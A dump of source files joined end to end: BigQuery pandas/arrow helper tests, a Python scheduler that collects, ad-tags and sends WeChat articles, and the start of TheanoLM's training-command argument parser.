schema.SchemaField("field01", "STRING"),
schema.SchemaField("field02", "BYTES"),
schema.SchemaField("field03", "INTEGER"),
)
dataframe = pandas.DataFrame(
{
"field00": ["whoami", "whatami"],
"field01": ["hello", "world"],
"field02": [b"abd", b"efg"],
"field03": [1, 2],
}
)
with warnings.catch_warnings(record=True) as warned:
arrow_table = module_under_test.dataframe_to_arrow(dataframe, bq_schema)
arrow_schema = arrow_table.schema
assert len(warned) == 1
warning = warned[0]
assert "field00" in str(warning)
assert len(arrow_schema) == len(bq_schema)
assert arrow_schema[0].name == "field00"
assert arrow_schema[1].name == "field01"
assert arrow_schema[2].name == "field02"
assert arrow_schema[3].name == "field03"
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_arrow_dict_sequence_schema(module_under_test):
dict_schema = [
{"name": "field01", "type": "STRING", "mode": "REQUIRED"},
{"name": "field02", "type": "BOOL", "mode": "NULLABLE"},
]
dataframe = pandas.DataFrame(
{"field01": ["hello", "world"], "field02": [True, False]}
)
arrow_table = module_under_test.dataframe_to_arrow(dataframe, dict_schema)
arrow_schema = arrow_table.schema
expected_fields = [
pyarrow.field("field01", "string", nullable=False),
pyarrow.field("field02", "bool", nullable=True),
]
assert list(arrow_schema) == expected_fields
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_parquet_w_extra_fields(module_under_test):
with pytest.raises(ValueError) as exc_context:
module_under_test.dataframe_to_parquet(
pandas.DataFrame(), (schema.SchemaField("not_in_df", "STRING"),), None
)
message = str(exc_context.value)
assert "bq_schema contains fields not present in dataframe" in message
assert "not_in_df" in message
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_parquet_w_missing_fields(module_under_test):
with pytest.raises(ValueError) as exc_context:
module_under_test.dataframe_to_parquet(
pandas.DataFrame({"not_in_bq": [1, 2, 3]}), (), None
)
message = str(exc_context.value)
assert "bq_schema is missing fields from dataframe" in message
assert "not_in_bq" in message
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_parquet_compression_method(module_under_test):
bq_schema = (schema.SchemaField("field00", "STRING"),)
dataframe = pandas.DataFrame({"field00": ["foo", "bar"]})
write_table_patch = mock.patch.object(
module_under_test.pyarrow.parquet, "write_table", autospec=True
)
with write_table_patch as fake_write_table:
module_under_test.dataframe_to_parquet(
dataframe, bq_schema, None, parquet_compression="ZSTD"
)
call_args = fake_write_table.call_args
assert call_args is not None
assert call_args.kwargs.get("compression") == "ZSTD"
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow(module_under_test):
dataframe = pandas.DataFrame(
data=[
{"id": 10, "status": "FOO", "created_at": datetime.date(2019, 5, 10)},
{"id": 20, "status": "BAR", "created_at": datetime.date(2018, 9, 12)},
]
)
with warnings.catch_warnings(record=True) as warned:
detected_schema = module_under_test.dataframe_to_bq_schema(
dataframe, bq_schema=[]
)
expected_schema = (
schema.SchemaField("id", "INTEGER", mode="NULLABLE"),
schema.SchemaField("status", "STRING", mode="NULLABLE"),
schema.SchemaField("created_at", "DATE", mode="NULLABLE"),
)
by_name = operator.attrgetter("name")
assert sorted(detected_schema, key=by_name) == sorted(expected_schema, key=by_name)
# there should be no relevant warnings
unwanted_warnings = [
warning for warning in warned if "could not determine" in str(warning).lower()
]
assert not unwanted_warnings
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test):
dataframe = pandas.DataFrame(
data=[
{"struct_field": {"one": 2}, "status": "FOO"},
{"struct_field": {"two": "222"}, "status": "BAR"},
]
)
with warnings.catch_warnings(record=True) as warned:
detected_schema = module_under_test.dataframe_to_bq_schema(
dataframe, bq_schema=[]
)
assert detected_schema is None
# a warning should also be issued
expected_warnings = [
warning for warning in warned if "could not determine" in str(warning).lower()
]
assert len(expected_warnings) == 1
assert "struct_field" in str(expected_warnings[0])
@pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`")
def test_dataframe_to_bq_schema_geography(module_under_test):
from shapely import wkt
df = geopandas.GeoDataFrame(
pandas.DataFrame(
dict(
name=["foo", "bar"],
geo1=[None, None],
geo2=[None, wkt.loads("Point(1 1)")],
)
),
geometry="geo1",
)
bq_schema = module_under_test.dataframe_to_bq_schema(df, [])
assert bq_schema == (
schema.SchemaField("name", "STRING"),
schema.SchemaField("geo1", "GEOGRAPHY"),
schema.SchemaField("geo2", "GEOGRAPHY"),
)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_no_valid_items(module_under_test):
series = pandas.Series([None, pandas.NA, float("NaN")])
result = module_under_test._first_array_valid(series)
assert result is None
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_valid_item_exists(module_under_test):
series = pandas.Series([None, [0], [1], None])
result = module_under_test._first_array_valid(series)
assert result == 0
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_all_nan_items_in_first_valid_candidate(module_under_test):
import numpy
series = pandas.Series(
[
None,
[None, float("NaN"), pandas.NA, pandas.NaT, numpy.nan],
None,
[None, None],
[None, float("NaN"), pandas.NA, pandas.NaT, numpy.nan, 42, None],
[1, 2, 3],
None,
]
)
result = module_under_test._first_array_valid(series)
assert result == 42
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test__first_array_valid_no_arrays_with_valid_items(module_under_test):
series = pandas.Series([[None, None], [None, None]])
result = module_under_test._first_array_valid(series)
assert result is None
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_type_detection_succeeds(module_under_test):
dataframe = pandas.DataFrame(
data=[
{
"bool_field": False,
"int_field": 123,
"float_field": 3.141592,
"time_field": datetime.time(17, 59, 47),
"timestamp_field": datetime.datetime(2005, 5, 31, 14, 25, 55),
"date_field": datetime.date(2005, 5, 31),
"bytes_field": b"some bytes",
"string_field": "some characters",
"numeric_field": decimal.Decimal("123.456"),
"bignumeric_field": decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)),
}
]
)
# NOTE: In Pandas dataframe, the dtype of Python's datetime instances is
# set to "datetime64[ns]", and pyarrow converts that to pyarrow.TimestampArray.
# We thus cannot expect to get a DATETIME date when converting back to the
# BigQuery type.
current_schema = (
schema.SchemaField("bool_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("int_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("float_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("time_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("timestamp_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("date_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("bytes_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("string_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("numeric_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("bignumeric_field", field_type=None, mode="NULLABLE"),
)
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
# there should be no relevant warnings
unwanted_warnings = [
warning for warning in warned if "Pyarrow could not" in str(warning)
]
assert not unwanted_warnings
# the augmented schema must match the expected
expected_schema = (
schema.SchemaField("bool_field", field_type="BOOL", mode="NULLABLE"),
schema.SchemaField("int_field", field_type="INT64", mode="NULLABLE"),
schema.SchemaField("float_field", field_type="FLOAT64", mode="NULLABLE"),
schema.SchemaField("time_field", field_type="TIME", mode="NULLABLE"),
schema.SchemaField("timestamp_field", field_type="TIMESTAMP", mode="NULLABLE"),
schema.SchemaField("date_field", field_type="DATE", mode="NULLABLE"),
schema.SchemaField("bytes_field", field_type="BYTES", mode="NULLABLE"),
schema.SchemaField("string_field", field_type="STRING", mode="NULLABLE"),
schema.SchemaField("numeric_field", field_type="NUMERIC", mode="NULLABLE"),
schema.SchemaField(
"bignumeric_field", field_type="BIGNUMERIC", mode="NULLABLE"
),
)
by_name = operator.attrgetter("name")
assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_repeated_fields(module_under_test):
dataframe = pandas.DataFrame(
data=[
# Include some values useless for type detection to make sure the logic
# indeed finds the value that is suitable.
{"string_array": None, "timestamp_array": None, "datetime_array": None},
{
"string_array": [None],
"timestamp_array": [None],
"datetime_array": [None],
},
{"string_array": None, "timestamp_array": None, "datetime_array": None},
{
"string_array": [None, "foo"],
"timestamp_array": [
None,
datetime.datetime(
2005, 5, 31, 14, 25, 55, tzinfo=datetime.timezone.utc
),
],
"datetime_array": [None, datetime.datetime(2005, 5, 31, 14, 25, 55)],
},
{"string_array": None, "timestamp_array": None, "datetime_array": None},
]
)
current_schema = (
schema.SchemaField("string_array", field_type=None, mode="NULLABLE"),
schema.SchemaField("timestamp_array", field_type=None, mode="NULLABLE"),
schema.SchemaField("datetime_array", field_type=None, mode="NULLABLE"),
)
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
# there should be no relevant warnings
unwanted_warnings = [
warning for warning in warned if "Pyarrow could not" in str(warning)
]
assert not unwanted_warnings
# the augmented schema must match the expected
expected_schema = (
schema.SchemaField("string_array", field_type="STRING", mode="REPEATED"),
schema.SchemaField("timestamp_array", field_type="TIMESTAMP", mode="REPEATED"),
schema.SchemaField("datetime_array", field_type="DATETIME", mode="REPEATED"),
)
by_name = operator.attrgetter("name")
assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_type_detection_fails(module_under_test):
dataframe = pandas.DataFrame(
data=[
{
"status": "FOO",
"struct_field": {"one": 1},
"struct_field_2": {"foo": "123"},
},
{
"status": "BAR",
"struct_field": {"two": "111"},
"struct_field_2": {"bar": 27},
},
]
)
current_schema = [
schema.SchemaField("status", field_type="STRING", mode="NULLABLE"),
schema.SchemaField("struct_field", field_type=None, mode="NULLABLE"),
schema.SchemaField("struct_field_2", field_type=None, mode="NULLABLE"),
]
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
assert augmented_schema is None
expected_warnings = [
warning for warning in warned if "could not determine" in str(warning)
]
assert len(expected_warnings) == 1
warning_msg = str(expected_warnings[0])
assert "pyarrow" in warning_msg.lower()
assert "struct_field" in warning_msg and "struct_field_2" in warning_msg
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_augment_schema_type_detection_fails_array_data(module_under_test):
dataframe = pandas.DataFrame(
data=[{"all_none_array": [None, float("NaN")], "empty_array": []}]
)
current_schema = [
schema.SchemaField("all_none_array", field_type=None, mode="NULLABLE"),
schema.SchemaField("empty_array", field_type=None, mode="NULLABLE"),
]
with warnings.catch_warnings(record=True) as warned:
augmented_schema = module_under_test.augment_schema(dataframe, current_schema)
assert augmented_schema is None
expected_warnings = [
warning for warning in warned if "could not determine" in str(warning)
]
assert len(expected_warnings) == 1
warning_msg = str(expected_warnings[0])
assert "pyarrow" in warning_msg.lower()
assert "all_none_array" in warning_msg and "empty_array" in warning_msg
def test_dataframe_to_parquet_dict_sequence_schema(module_under_test):
pandas = pytest.importorskip("pandas")
dict_schema = [
{"name": "field01", "type": "STRING", "mode": "REQUIRED"},
{"name": "field02", "type": "BOOL", "mode": "NULLABLE"},
]
dataframe = pandas.DataFrame(
{"field01": ["hello", "world"], "field02": [True, False]}
)
write_table_patch = mock.patch.object(
module_under_test.pyarrow.parquet, "write_table", autospec=True
)
to_arrow_patch = mock.patch.object(
module_under_test, "dataframe_to_arrow", autospec=True
)
with write_table_patch, to_arrow_patch as fake_to_arrow:
module_under_test.dataframe_to_parquet(dataframe, dict_schema, None)
expected_schema_arg = [
schema.SchemaField("field01", "STRING", mode="REQUIRED"),
schema.SchemaField("field02", "BOOL", mode="NULLABLE"),
]
schema_arg = fake_to_arrow.call_args.args[1]
assert schema_arg == expected_schema_arg
def test__download_table_bqstorage_stream_includes_read_session(
monkeypatch, module_under_test
):
import google.cloud.bigquery_storage_v1.reader
import google.cloud.bigquery_storage_v1.types
monkeypatch.setattr(_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None)
monkeypatch.setattr(bigquery_storage, "__version__", "2.5.0")
bqstorage_client = mock.create_autospec(
bigquery_storage.BigQueryReadClient, instance=True
)
reader = mock.create_autospec(
google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True
)
bqstorage_client.read_rows.return_value = reader
session = google.cloud.bigquery_storage_v1.types.ReadSession()
module_under_test._download_table_bqstorage_stream(
module_under_test._DownloadState(),
bqstorage_client,
session,
google.cloud.bigquery_storage_v1.types.ReadStream(name="test"),
queue.Queue(),
mock.Mock(),
)
reader.rows.assert_called_once_with(session)
@pytest.mark.skipif(
not _helpers.BQ_STORAGE_VERSIONS.is_read_session_optional,
reason="Requires `google-cloud-bigquery-storage` >= 2.6.0",
)
def test__download_table_bqstorage_stream_omits_read_session(
monkeypatch, module_under_test
):
import google.cloud.bigquery_storage_v1.reader
import google.cloud.bigquery_storage_v1.types
monkeypatch.setattr(_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None)
monkeypatch.setattr(bigquery_storage, "__version__", "2.6.0")
bqstorage_client = mock.create_autospec(
bigquery_storage.BigQueryReadClient, instance=True
)
reader = mock.create_autospec(
google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True
)
bqstorage_client.read_rows.return_value = reader
session = google.cloud.bigquery_storage_v1.types.ReadSession()
module_under_test._download_table_bqstorage_stream(
module_under_test._DownloadState(),
bqstorage_client,
session,
google.cloud.bigquery_storage_v1.types.ReadStream(name="test"),
queue.Queue(),
mock.Mock(),
)
reader.rows.assert_called_once_with()
@pytest.mark.parametrize(
"stream_count,maxsize_kwarg,expected_call_count,expected_maxsize",
[
(3, {"max_queue_size": 2}, 3, 2), # custom queue size
(4, {}, 4, 4), # default queue size
(7, {"max_queue_size": None}, 7, 0), # infinite queue size
],
)
def test__download_table_bqstorage(
module_under_test,
stream_count,
maxsize_kwarg,
expected_call_count,
expected_maxsize,
):
from google.cloud.bigquery import dataset
from google.cloud.bigquery import table
queue_used = None # A reference to the queue used by code under test.
bqstorage_client = mock.create_autospec(
bigquery_storage.BigQueryReadClient, instance=True
)
fake_session = mock.Mock(streams=["stream/s{i}" for i in range(stream_count)])
bqstorage_client.create_read_session.return_value = fake_session
table_ref = table.TableReference(
dataset.DatasetReference("project-x", "dataset-y"),
"table-z",
)
def fake_download_stream(
download_state, bqstorage_client, session, stream, worker_queue, page_to_item
):
nonlocal queue_used
queue_used = worker_queue
try:
worker_queue.put_nowait("result_page")
except queue.Full: # pragma: NO COVER
pass
download_stream = mock.Mock(side_effect=fake_download_stream)
with mock.patch.object(
module_under_test, "_download_table_bqstorage_stream", new=download_stream
):
result_gen = module_under_test._download_table_bqstorage(
"some-project", table_ref, bqstorage_client, **maxsize_kwarg
)
list(result_gen)
# Timing-safe, as the method under test should block until the pool shutdown is
# complete, at which point all download stream workers have already been submitted
# to the thread pool.
assert download_stream.call_count == stream_count # once for each stream
assert queue_used.maxsize == expected_maxsize
def test_download_arrow_row_iterator_unknown_field_type(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], [2.2, 22.22, 222.222]]
pages = [fake_page]
bq_schema = [
schema.SchemaField("population_size", "INTEGER"),
schema.SchemaField("alien_field", "ALIEN_FLOAT_TYPE"),
]
results_gen = module_under_test.download_arrow_row_iterator(pages, bq_schema)
with warnings.catch_warnings(record=True) as warned:
result = next(results_gen)
unwanted_warnings = [
warning
for warning in warned
if "please pass schema= explicitly" in str(warning).lower()
]
assert not unwanted_warnings
assert len(result.columns) == 2
col = result.columns[0]
assert type(col) is pyarrow.lib.Int64Array
assert col.to_pylist() == [1, 10, 100]
col = result.columns[1]
assert type(col) is pyarrow.lib.DoubleArray
assert col.to_pylist() == [2.2, 22.22, 222.222]
def test_download_arrow_row_iterator_known_field_type(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]]
pages = [fake_page]
bq_schema = [
schema.SchemaField("population_size", "INTEGER"),
schema.SchemaField("non_alien_field", "STRING"),
]
results_gen = module_under_test.download_arrow_row_iterator(pages, bq_schema)
with warnings.catch_warnings(record=True) as warned:
result = next(results_gen)
unwanted_warnings = [
warning
for warning in warned
if "please pass schema= explicitly" in str(warning).lower()
]
assert not unwanted_warnings
assert len(result.columns) == 2
col = result.columns[0]
assert type(col) is pyarrow.lib.Int64Array
assert col.to_pylist() == [1, 10, 100]
col = result.columns[1]
assert type(col) is pyarrow.lib.StringArray
assert col.to_pylist() == ["2.2", "22.22", "222.222"]
def test_download_arrow_row_iterator_dict_sequence_schema(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]]
pages = [fake_page]
dict_schema = [
{"name": "population_size", "type": "INTEGER", "mode": "NULLABLE"},
{"name": "non_alien_field", "type": "STRING", "mode": "NULLABLE"},
]
results_gen = module_under_test.download_arrow_row_iterator(pages, dict_schema)
result = next(results_gen)
assert len(result.columns) == 2
col = result.columns[0]
assert type(col) is pyarrow.lib.Int64Array
assert col.to_pylist() == [1, 10, 100]
col = result.columns[1]
assert type(col) is pyarrow.lib.StringArray
assert col.to_pylist() == ["2.2", "22.22", "222.222"]
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_download_dataframe_row_iterator_dict_sequence_schema(module_under_test):
fake_page = api_core.page_iterator.Page(
parent=mock.Mock(),
items=[{"page_data": "foo"}],
item_to_value=api_core.page_iterator._item_to_value_identity,
)
fake_page._columns = [[1, 10, 100], ["2.2", "22.22", "222.222"]]
pages = [fake_page]
dict_schema = [
{"name": "population_size", "type": "INTEGER", "mode": "NULLABLE"},
{"name": "non_alien_field", "type": "STRING", "mode": "NULLABLE"},
]
results_gen = module_under_test.download_dataframe_row_iterator(
pages, dict_schema, dtypes={}
)
result = next(results_gen)
expected_result = pandas.DataFrame(
collections.OrderedDict(
[
("population_size", [1, 10, 100]),
("non_alien_field", ["2.2", "22.22", "222.222"]),
]
)
)
assert result.equals(expected_result)
with pytest.raises(StopIteration):
result = next(results_gen)
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_table_data_listpage_to_dataframe_skips_stop_iteration(module_under_test):
dataframe = module_under_test._row_iterator_page_to_dataframe([], [], {})
assert isinstance(dataframe, pandas.DataFrame)
def test_bq_to_arrow_field_type_override(module_under_test):
# When loading pandas data, we may need to override the type
# decision based on data contents, because GEOGRAPHY data can be
# stored as either text or binary.
assert (
module_under_test.bq_to_arrow_field(schema.SchemaField("g", "GEOGRAPHY")).type
== pyarrow.string()
)
assert (
module_under_test.bq_to_arrow_field(
schema.SchemaField("g", "GEOGRAPHY"),
pyarrow.binary(),
).type
== pyarrow.binary()
)
@pytest.mark.parametrize(
"field_type, metadata",
[
("datetime", {b"ARROW:extension:name": b"google:sqlType:datetime"}),
(
"geography",
{
b"ARROW:extension:name": b"google:sqlType:geography",
b"ARROW:extension:metadata": b'{"encoding": "WKT"}',
},
),
],
)
def test_bq_to_arrow_field_metadata(module_under_test, field_type, metadata):
assert (
module_under_test.bq_to_arrow_field(
schema.SchemaField("g", field_type)
).metadata
== metadata
)
def test_verify_pandas_imports_no_pandas(module_under_test, monkeypatch):
monkeypatch.setattr(module_under_test, "pandas", None)
with pytest.raises(ValueError, match="Please install the 'pandas' package"):
module_under_test.verify_pandas_imports()
@pytest.mark.skipif(pandas is None, reason="Requires `pandas`")
def test_verify_pandas_imports_no_db_dtypes(module_under_test, monkeypatch):
monkeypatch.setattr(module_under_test, "db_dtypes", None)
with pytest.raises(ValueError, match="Please install the 'db-dtypes' package"):
module_under_test.verify_pandas_imports()
|
py | 1a3f926e41b9f70ace8c5523b8fc86f590e2e59a | #!/usr/bin/env python
"""
Created by howie.hu at 2021/4/10.
Description:常用调度函数
- 运行: 根目录执行,其中环境文件pro.env根据实际情况选择即可
- 命令: PIPENV_DOTENV_LOCATION=./pro.env pipenv run python src/schedule_task/all_tasks.py
Changelog: all notable changes to this file will be documented
"""
import time
from src.classifier import model_predict_factory
from src.collector.collect_factory import collect_factory
from src.config import Config
from src.databases import MongodbManager
from src.processor import fetch_keyword_list
from src.sender import send_factory
from src.utils.log import LOGGER
def update_wechat_doc():
"""
抓取最新的文章,然后持久化到数据库
:param wechat_list:
:return:
"""
# TODO 统一的地方进行配置管理
t_collect_type = "wechat_sougou"
t_collect_config = {
"wechat_list": Config.WECHAT_LIST,
"delta_time": 5,
# playwright
"spider_type": "playwright",
}
collect_factory(t_collect_type, t_collect_config)
def update_ads_tag(is_force=False):
"""
对订阅的文章进行广告标记
:param is_force: 是否强制重新判决
:return:
"""
mongo_base = MongodbManager.get_mongo_base(mongodb_config=Config.MONGODB_CONFIG)
coll = mongo_base.get_collection(coll_name="liuli_articles")
if is_force:
query = {}
else:
query = {"cos_model": {"$exists": False}}
# 查找没有被标记的文章,基于相似度模型进行判断
for each_data in coll.find(query):
doc_name = each_data["doc_name"]
doc_link = each_data["doc_link"]
doc_source_name = each_data["doc_source_name"]
doc_content = each_data["doc_content"]
doc_keywords = each_data.get("doc_keywords")
if not doc_keywords:
keyword_list = fetch_keyword_list(doc_content)
doc_keywords = " ".join(keyword_list)
each_data["doc_keywords"] = doc_keywords
# 基于余弦相似度
cos_model_resp = model_predict_factory(
model_name="cos",
model_path="",
input_dict={"text": doc_name + doc_keywords, "cos_value": Config.COS_VALUE},
# input_dict={"text": doc_name, "cos_value": Config.COS_VALUE},
).to_dict()
each_data["cos_model"] = cos_model_resp
if cos_model_resp["result"] == 1:
LOGGER.info(
f"[{doc_source_name}] {doc_name} 被识别为广告[{cos_model_resp['probability']}],链接为:{each_data['doc_link']}"
)
coll.update_one(
filter={"doc_id": each_data["doc_id"]},
update={"$set": each_data},
upsert=True,
)
def send_doc():
"""
对文章进行分发
:return:
"""
if Config.SENDER_LIST:
# 是否启用分发器
mongo_base = MongodbManager.get_mongo_base(mongodb_config=Config.MONGODB_CONFIG)
coll = mongo_base.get_collection(coll_name="liuli_articles")
cur_ts = time.time()
filter_dict = {
# 时间范围,除第一次外后面其实可以去掉
"doc_ts": {"$gte": cur_ts - (2 * 24 * 60 * 60), "$lte": cur_ts},
# 至少打上一个模型标签
"cos_model": {"$exists": True},
}
# 查找所有可分发文章
for each_data in coll.find(filter_dict):
# 分别分发给各个目标
for send_type in Config.SENDER_LIST:
# 暂时固定,测试
send_config = {}
each_data["doc_cus_des"] = "🤓非广告"
cos_model_resp = each_data["cos_model"]
if cos_model_resp["result"] == 1:
# 广告标记
each_data[
"doc_cus_des"
] = f"👿广告[概率:{cos_model_resp['probability']}]"
send_factory(
send_type=send_type, send_config=send_config, send_data=each_data
)
else:
LOGGER.info("未配置分发器!")
if __name__ == "__main__":
# 第一次启动请执行
# update_wechat_doc()
# 每次强制重新打标签
# update_ads_tag(is_force=False)
send_doc()
|
py | 1a3f95da831c7d2fcbdd9f410a15c1467a9401e7 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""A module that implements the "theanolm train" command.
"""
import sys
import mmap
import logging
import h5py
import numpy
import theano
from theanolm import Vocabulary, Architecture, Network
from theanolm.backend import TextFileType, get_default_device
from theanolm.parsing import LinearBatchIterator
from theanolm.training import Trainer, create_optimizer, CrossEntropyCost, \
NCECost, BlackoutCost
from theanolm.scoring import TextScorer
from theanolm.vocabulary import compute_word_counts
def add_arguments(parser):
"""Specifies the command line arguments supported by the "theanolm train"
command.
:type parser: argparse.ArgumentParser
:param parser: a command line argument parser
"""
argument_group = parser.add_argument_group("data")
argument_group.add_argument(
'model_path', metavar='MODEL-FILE', type=str,
help='path where the best model state will be saved in HDF5 binary '
'data format')
argument_group.add_argument(
'--training-set', metavar='FILE', type=TextFileType('r'), nargs='+',
required=True,
help='text files containing training data (UTF-8, one sentence per '
'line, assumed to be compressed if the name ends in ".gz")')
argument_group.add_argument(
'--validation-file', metavar='VALID-FILE', type=TextFileType('r'),
default=None,
help='text file containing validation data for early stopping (UTF-8, '
'one sentence per line, assumed to be compressed if the name ends '
'in ".gz")')
argument_group = parser.add_argument_group("vocabulary")
argument_group.add_argument(
'--vocabulary', metavar='FILE', type=str, default=None,
help='word or class vocabulary to be used in the neural network input '
'and output, in the format specified by the --vocabulary-format '
'argument (UTF-8 text, default is to use all the words from the '
'training data)')
argument_group.add_argument(
'--vocabulary-format', metavar='FORMAT', type=str, default='words',
choices=['words', 'classes', 'srilm-classes'],
help='format of the file specified with --vocabulary argument, one of '
'"words" (one word per line, default), "classes" (word and class '
'ID per line), "srilm-classes" (class name, membership '
'probability, and word per line)')
argument_group.add_argument(
'--num-classes', metavar='N', type=int, default=None,
help='generate N classes using a simple word frequency based algorithm '
'when --vocabulary argument is not given (default is to not use '
'word classes)')
argument_group = parser.add_argument_group("network architecture")
argument_group.add_argument(
'--architecture', metavar='FILE', type=str, default='lstm300',
help='path to neural network architecture description, or a standard '
'architecture name, "lstm300" or "lstm1500" (default "lstm300")')
argument_group = parser.add_argument_group("training process")
argument_group.add_argument(
'--sampling', metavar='FRACTION', type=float, nargs='*', default=[],
help='randomly sample only FRACTION of each training file on each '
'epoch (list the fractions in the same order as the training '
'files)')
argument_group.add_argument(
'--sequence-length', metavar='N', type=int, default=100,
help='ignore sentences longer than N words (default 100)')
argument_group.add_argument(
'--batch-size', metavar='N', type=int, default=16,
help='each mini-batch will contain N sentences (default 16)')
argument_group.add_argument(
'--validation-frequency', metavar='N', type=int, default='5',
help='cross-validate for reducing learning rate or early stopping N '
'times per training epoch (default 5)')
argument_group.add_argument(
'--patience', metavar='N', type=int, default=4,
help='allow perplexity to increase N consecutive cross-validations, '
'before decreasing learning rate; if less than zero, never '
'decrease learning rate (default 4)')
argument_group.add_argument(
'--random-seed', metavar='N', type=int, default=None,
help='seed to initialize the random state (default is to seed from a '
'random source provided by the oprating system)')
argument_group = parser.add_argument_group("optimization")
argument_group.add_argument(
'--optimization-method', metavar='NAME', type=str, default='adagrad',
choices=['sgd', 'nesterov', 'adagrad', 'adadelta', 'rmsprop-sgd',
'rmsprop-nesterov', 'adam'],
help='optimization method, one of "sgd", "nesterov", "adagrad", '
'"adadelta", "rmsprop-sgd", "rmsprop-nesterov", "adam" '
'(default "adagrad")')
argument_group.add_argument(
'--learning-rate', metavar='ALPHA', type=float, default=0.1,
help='initial learning rate (default 0.1)')
argument_group.add_argument(
'--l1-regularization', metavar='LAMBDA', type=float, default=None,
help='add L1 regularization term with weight LAMBDA to the cost')
argument_group.add_argument(
'--l2-regularization', metavar='LAMBDA', type=float, default=None,
help='add L2 regularization term with weight LAMBDA to the cost')
argument_group.add_argument(
'--momentum', metavar='BETA', type=float, default=0.9,
help='momentum coefficient for momentum optimization methods (default '
'0.9)')
argument_group.add_argument(
'--gradient-decay-rate', metavar='GAMMA', type=float, default=0.9,
help='geometric rate for averaging gradients (default 0.9)')
argument_group.add_argument(
'--sqr-gradient-decay-rate', metavar='GAMMA', type=float, default=0.999,
help='geometric rate for averaging squared gradients in Adam optimizer '
'(default 0.999)')
argument_group.add_argument(
'--numerical-stability-term', metavar='EPSILON', type=float,
default=1e-6,
help='a value that is used to prevent instability when dividing by '
'very small numbers (default 1e-6)')
argument_group.add_argument(
'--gradient-normalization', metavar='THRESHOLD', type=float,
default=5,
help='scale down the gradients if necessary to make sure their norm '
'(normalized by mini-batch size) will not exceed THRESHOLD '
'(default 5)')
argument_group.add_argument(
'--cost', metavar='NAME', type=str, default='cross-entropy',
choices=['cross-entropy', 'nce', 'blackout'],
help='cost function, one of "cross-entropy" (default), "nce" '
'(noise-contrastive estimation), or "blackout"')
argument_group.add_argument(
'--num-noise-samples', metavar='K', type=int, default=5,
help='sampling based costs sample K noise words per one training word '
'(default 5)')
argument_group.add_argument(
'--noise-distribution', metavar='DIST', type=str, default='uniform',
choices=['uniform', 'log-uniform', 'unigram'],
help='sample noise from DIST; one of "uniform" (default, but less '
'accurate), "log-uniform" (the vocabulary should be ordered by '
'decreasing frequency), "unigram" (unigram distribution of words '
'in training data, slow)')
argument_group.add_argument(
'--noise-dampening', metavar='ALPHA', type=float, default=0.5,
help='the empirical unigram distribution is raised to the power ALPHA '
'before sampling noise words; 0.0 corresponds to the uniform '
'distribution and 1.0 corresponds to the unigram distribution '
'(only applicable with --noise-distribution=unigram, default 0.5)')
argument_group.add_argument(
'--noise-sharing', metavar='SHARING', type=str, default=None,
choices=['seq', 'batch', None],
help='can be "seq" for sharing noise samples between mini-batch '
'sequences, or "batch" for sharing noise samples across einter '
'mini-batch for improved speed (default is no sharing, which is '
'very slow)')
argument_group.add_argument(
'--exclude-unk', action="store_true",
help="exclude <unk> tokens from cost and perplexity computations")
argument_group.add_argument(
'--weights', metavar='LAMBDA', type=float, nargs='*', default=[],
help='scale a mini-batch update by LAMBDA if the data is from the '
'corresponding training file (list the weights in the same order '
'as the training files)')
argument_group = parser.add_argument_group("early stopping")
argument_group.add_argument(
'--stopping-criterion', metavar='NAME', type=str,
default='annealing-count',
choices=['epoch-count', 'no-improvement', 'annealing-count'],
help='selects a criterion for early-stopping, one of "epoch-count" '
'(fixed number of epochs), "no-improvement" (no improvement since '
